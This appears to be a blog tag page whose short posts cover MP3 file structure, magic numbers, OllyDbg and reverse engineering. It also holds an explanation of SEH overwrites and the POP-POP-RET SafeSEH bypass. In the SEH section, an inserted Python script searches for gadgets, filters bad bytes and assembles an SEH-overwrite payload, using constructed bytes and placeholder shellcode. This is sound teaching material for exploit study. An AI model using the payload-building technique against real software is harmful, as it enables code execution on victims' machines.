Posts tagged with: malware analysis

MP3 File Structure

A file's structure is the layout of the bytes inside it: which fields come first, how long they are and what they mean. A file is the smallest unit a filesystem hands to a program, and without an agreed structure it is just a blob of bytes that no program can read. Each file type follows its own specification, so a PDF named A has the same structure as PDF B, C, D or any other PDF, while an .avi file is laid out very differently from a .doc file. That fixed layout is what makes a file readable to the software that expects it, and it is also what an analyst relies on when a file claims to be one thing and is actually another.
In this post I'll try to explain the structure of an mp3 file.   🙂


The Magic Number

Hoho, in this post I'll explain a thing called the "Magic Number". Can you guess already what it is? Some kind of number that has a magic spell in it? Some kind of magic trick that uses numbers as its medium? Or something else?

Unfortunately, the "magic number" in this post has nothing to do with magic in the literal sense. It is a thing related to file formats. Originally the term was used for a specific set of 2-byte identifiers at the beginning of a file, but since any undecoded binary sequence can be regarded as a number, any feature of a file format which uniquely distinguishes it can be used for identification. Identify what? The file format, of course. Because the magic number sits at a fixed offset inside the file rather than in its name, tools such as the Unix file command use it to identify a file, and it is the first thing to check when a file's extension might be lying about what the file really is.
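As an added example (not code from the original posts), the following Python script identifies a file by its magic number at the offset the format defines, flags an extension that disagrees with the bytes, and for an MP3 decodes the ID3v2 tag header and the first audio frame header, which is the structure the MP3 post above is about. The signature table, the sample MP3 bytes and the fake PDF bytes are constructed for the example; the table covers only a handful of formats and the frame decoder handles only Layer III.

```python
"""Added example, not code from the original posts: identify a file by its
magic number (without trusting the extension) and, for an MP3, decode the
ID3v2 tag header and the first MPEG audio frame header.
All sample bytes below are constructed for illustration."""
import struct

# (offset, signature, format). The offset matters: not every signature sits
# at byte 0 (RIFF/WAVE has "WAVE" at 8, ISO 9660 has "CD001" at 0x8001).
MAGICS = [
    (0, b"%PDF-", "pdf"),
    (0, b"MZ", "pe"),
    (0, b"\x7fELF", "elf"),
    (0, b"\x89PNG\r\n\x1a\n", "png"),
    (0, b"PK\x03\x04", "zip"),
    (0, b"ID3", "mp3"),
    (8, b"WAVE", "wav"),
    (0x8001, b"CD001", "iso9660"),
]

def identify(data: bytes) -> str:
    """Return the format implied by the magic number, or 'unknown'."""
    for offset, magic, name in MAGICS:
        if data[offset:offset + len(magic)] == magic:
            return name
    # A raw MP3 with no ID3 tag starts directly with a frame sync: 11 one bits.
    if len(data) >= 2 and data[0] == 0xFF and (data[1] & 0xE0) == 0xE0:
        return "mp3"
    return "unknown"

def extension_mismatch(filename: str, data: bytes) -> bool:
    """True when the extension claims one format and the bytes say another
    (e.g. 'invoice.pdf' that is really a PE executable)."""
    ext = filename.rsplit(".", 1)[-1].lower()
    claimed = {"exe": "pe", "dll": "pe", "docx": "zip", "jar": "zip"}.get(ext, ext)
    actual = identify(data)
    return actual != "unknown" and actual != claimed

def parse_id3v2(data: bytes) -> dict:
    """ID3v2 header: 'ID3', major, revision, flags, then the tag size as four
    sync-safe bytes (7 bits each, high bit clear, so the size can never be
    mistaken for a frame sync). Audio follows the tag and its optional footer."""
    if data[:3] != b"ID3" or len(data) < 10:
        return {}
    major, revision, flags = data[3], data[4], data[5]
    size = 0
    for b in data[6:10]:
        if b & 0x80:
            raise ValueError("ID3v2 size byte is not sync-safe")
        size = (size << 7) | b
    footer = 10 if flags & 0x10 else 0
    return {"version": (major, revision), "flags": flags,
            "tag_size": size, "audio_offset": 10 + size + footer}

# Layer III bitrate tables (kbps) and sample rates indexed by the version bits.
BITRATE_MPEG1_L3 = [0, 32, 40, 48, 56, 64, 80, 96, 112, 128, 160, 192, 224, 256, 320]
BITRATE_MPEG2_L3 = [0, 8, 16, 24, 32, 40, 48, 56, 64, 80, 96, 112, 128, 144, 160]
SAMPLE_RATES = {3: (44100, 48000, 32000),   # MPEG-1
                2: (22050, 24000, 16000),   # MPEG-2
                0: (11025, 12000, 8000)}    # MPEG-2.5

def parse_mp3_frame_header(hdr: bytes) -> dict:
    """Decode a 4-byte frame header, MSB first: sync(11) version(2) layer(2)
    no_crc(1) bitrate(4) samplerate(2) padding(1) private(1) channel_mode(2)."""
    if len(hdr) < 4:
        raise ValueError("need 4 bytes")
    word = struct.unpack(">I", hdr[:4])[0]
    if word >> 21 != 0x7FF:
        raise ValueError("no frame sync")
    version = (word >> 19) & 3   # 3 = MPEG-1, 2 = MPEG-2, 0 = MPEG-2.5, 1 reserved
    layer = (word >> 17) & 3     # 1 = Layer III, 2 = Layer II, 3 = Layer I
    crc_protected = not (word >> 16) & 1
    bitrate_idx = (word >> 12) & 0xF
    rate_idx = (word >> 10) & 3
    padding = (word >> 9) & 1
    channel_mode = (word >> 6) & 3  # 0 stereo, 1 joint stereo, 2 dual, 3 mono
    if version == 1 or layer != 1 or bitrate_idx in (0, 15) or rate_idx == 3:
        raise ValueError("reserved or unsupported header field")
    mpeg1 = version == 3
    bitrate = (BITRATE_MPEG1_L3 if mpeg1 else BITRATE_MPEG2_L3)[bitrate_idx]
    samplerate = SAMPLE_RATES[version][rate_idx]
    # Layer III frame size: 144 (MPEG-1) or 72 (MPEG-2/2.5) * bitrate / samplerate.
    frame_len = (144 if mpeg1 else 72) * bitrate * 1000 // samplerate + padding
    return {"mpeg1": mpeg1, "crc_protected": crc_protected, "bitrate_kbps": bitrate,
            "samplerate": samplerate, "padding": padding,
            "channel_mode": channel_mode, "frame_length": frame_len}

def analyze_mp3(data: bytes) -> dict:
    """Skip the ID3v2 tag if present and decode the first audio frame header."""
    tag = parse_id3v2(data)
    start = tag.get("audio_offset", 0)
    return {"id3v2": tag, "first_frame": parse_mp3_frame_header(data[start:start + 4])}

# Constructed sample: ID3v2.3 tag with a 23-byte body, then one MPEG-1 Layer III
# frame header (FF FB 90 00 = 128 kbps, 44.1 kHz, stereo, no CRC, no padding).
SAMPLE_MP3 = (b"ID3\x03\x00\x00\x00\x00\x00\x17" + b"\x00" * 23
              + b"\xff\xfb\x90\x00" + b"\x00" * 20)
SAMPLE_FAKE_PDF = b"MZ\x90\x00" + b"\x00" * 60   # a PE stub named like a PDF

if __name__ == "__main__":
    print(identify(SAMPLE_MP3), analyze_mp3(SAMPLE_MP3))
    print("invoice.pdf mismatch:", extension_mismatch("invoice.pdf", SAMPLE_FAKE_PDF))
```

Two things worth noticing: the sync-safe size in the ID3v2 header keeps the high bit of every byte clear, so a decoder scanning for the 0xFFE frame sync can never mistake the tag size for audio; and a magic-number check is only as good as its table, so a file that matches nothing is "unknown", not harmless.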

More About SEH and SafeSEH

As explained before, SEH (Structured Exception Handling) is the Windows mechanism a program uses to handle abnormal conditions during execution (an access violation, a division by zero) so that it can recover instead of crashing or hanging. On 32-bit Windows the registered handlers live on the stack as a linked list of records, each holding a pointer to the next record (nSEH) and a pointer to the handler function (SEH). When the excess data sent by a fuzzer overflows a stack buffer, the saved return address is not always reachable or usable, but the overflow frequently overwrites one of these SEH records, and as soon as the program faults Windows calls whatever the overwritten handler pointer now points to. That is why an SEH overwrite is as useful to an attacker as a Direct Return Exploitation: once the handler pointer is controlled, the execution path of the CPU is controlled too. The protection that stands in the way is SafeSEH, which makes the exception dispatcher check a handler pointer against the module's table of registered handlers before calling it, and it is that check that forced attackers to develop a bypass.

The most popular technique for turning an SEH overwrite into code execution is the POP, POP, RETN sequence. The x86 stack is a last-in, first-out list of 32-bit values, and when Windows invokes an exception handler it pushes the handler's arguments so that the third value on the stack (at ESP+8) is the address of the overwritten exception record itself. The first POP removes the top value (the return address into the exception dispatcher), the second POP removes the next one (the pointer to the exception record structure), and RETN then pops the third value into EIP. That third value is the address of nSEH, a field the attacker controls, so execution resumes inside the attacker's buffer; nSEH usually holds a short jump over the 4-byte handler slot into the shellcode. The address of the POP, POP, RETN gadget written into the handler slot must come from a module compiled without SafeSEH, because SafeSEH only allows handlers listed in that module's registered handler table.
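The sequence above, as an added example that is not the post's own code: a Python script that searches a buffer of machine code for POP r32; POP r32; RET gadgets (the same thing mona.py's seh command does on a real module), rejects candidate addresses that contain bad bytes, and lays out the SEH-overwrite payload around the chosen address. The module bytes, the base address 0x10101000 and the offset of 100 are constructed for the example, and the byte-pattern search can also match inside a longer instruction, so a real candidate should be confirmed in a debugger.

```python
"""Added example, not the original post's code: locate POP r32 / POP r32 / RET
gadgets in a byte buffer (a stand-in for a module linked without SafeSEH) and
lay out an SEH-overwrite payload around one of them. The module bytes, its
base address and the overflow offset are all constructed for illustration."""
import re
import struct

# x86 encodings: POP r32 is one byte 0x58..0x5F, RET is 0xC3, RET imm16 is
# 0xC2 followed by two bytes. re.DOTALL lets '.' match any byte, 0x0A included.
POP_POP_RET = re.compile(rb"[\x58-\x5f][\x58-\x5f](?:\xc3|\xc2..)", re.DOTALL)

POP_NAMES = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]

def disasm_ppr(gadget: bytes) -> str:
    """Human-readable form of a matched gadget, e.g. 'pop eax; pop ebx; ret'."""
    pops = [f"pop {POP_NAMES[b - 0x58]}" for b in gadget[:2]]
    if gadget[2] == 0xC3:
        ret = "ret"
    else:
        imm = struct.unpack("<H", gadget[3:5])[0]
        ret = f"retn {imm:#x}"
    return "; ".join(pops + [ret])

def find_ppr(module: bytes, base: int) -> list:
    """Return (address, gadget) for every POP/POP/RET sequence in the buffer."""
    return [(base + m.start(), m.group()) for m in POP_POP_RET.finditer(module)]

def usable(addr: int, bad_bytes: bytes = b"\x00\x0a\x0d") -> bool:
    """The address is written into the buffer little-endian, so none of its
    bytes may be one the vulnerable copy routine stops on (NUL, LF, CR)."""
    return not any(b in bad_bytes for b in struct.pack("<I", addr))

def build_seh_payload(offset: int, ppr_addr: int, shellcode: bytes) -> bytes:
    """Stack layout after the overflow:
         [junk * offset][nSEH: 4 bytes][SEH: handler pointer][shellcode]
    The handler slot receives the POP/POP/RET address. When the exception is
    dispatched the address of nSEH sits at ESP+8, so POP, POP, RET lands on
    nSEH, which holds 'jmp short +6' to hop over the 4-byte handler slot."""
    nseh = b"\xeb\x06\x90\x90"          # jmp short +6 ; nop ; nop
    return b"A" * offset + nseh + struct.pack("<I", ppr_addr) + shellcode

# Constructed "module": NOP filler with two gadgets planted in it.
MODULE_BASE = 0x10101000
MODULE = (b"\x90" * 16 + b"\x58\x5b\xc3"            # pop eax; pop ebx; ret
          + b"\x90" * 8 + b"\x59\x5a\xc2\x04\x00"   # pop ecx; pop edx; retn 4
          + b"\x90" * 4)

def pick_gadget(module: bytes = MODULE, base: int = MODULE_BASE) -> int:
    """First POP/POP/RET whose address contains no bad bytes."""
    for addr, gadget in find_ppr(module, base):
        if usable(addr):
            return addr
    raise LookupError("no usable POP/POP/RET gadget")

if __name__ == "__main__":
    for addr, gadget in find_ppr(MODULE, MODULE_BASE):
        print(f"{addr:#010x}: {disasm_ppr(gadget)}  usable={usable(addr)}")
    payload = build_seh_payload(offset=100, ppr_addr=pick_gadget(), shellcode=b"\xcc" * 8)
    print(len(payload), "bytes, nSEH/SEH/shellcode:", payload[100:].hex())
```

The bad-byte filter is the step people forget: a gadget at 0x10000010 is useless if the overflow is reached through a string copy, because its little-endian encoding starts with 0x10 0x00 and the NUL ends the copy before the handler slot is fully written. A module that is ASLR-enabled is equally unusable even without SafeSEH, since the gadget address changes on every load.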

Introduction to “OllyDbg”

In the previous post we looked at reverse engineering. Now we turn to one of the tools used for it, OllyDbg.

Before discussing OllyDbg we need to know what debugging is. Debugging is a structured process for finding bugs or defects in a computer program, reducing their number and repairing them. A bug in a system made of many subsystems is harder to debug, because a change in one subsystem can make bugs appear in another.

To debug we need a tool called a debugger. It runs the program under control, shows what the software is doing in memory (the registers, the stack, the instruction being executed) and lets us stop it at a chosen point, so we can see exactly where a bug appears. OllyDbg and Immunity Debugger are examples of debuggers.

“Reverse Engineering” at a Glance

Let's talk briefly about Reverse Engineering, because it is also an important thing to know if you want to become an expert hacker.

Reverse Engineering is the activity of discovering what something is made of, how it works and what its purpose is. In other words, it is discovering the technological principles of a thing by analyzing its structure, function and operation. Usually the object being reverse engineered is taken apart from its original form and each part is then analyzed one by one, thoroughly. For software this means working from the compiled binary back toward its logic, since the source code is normally not available.
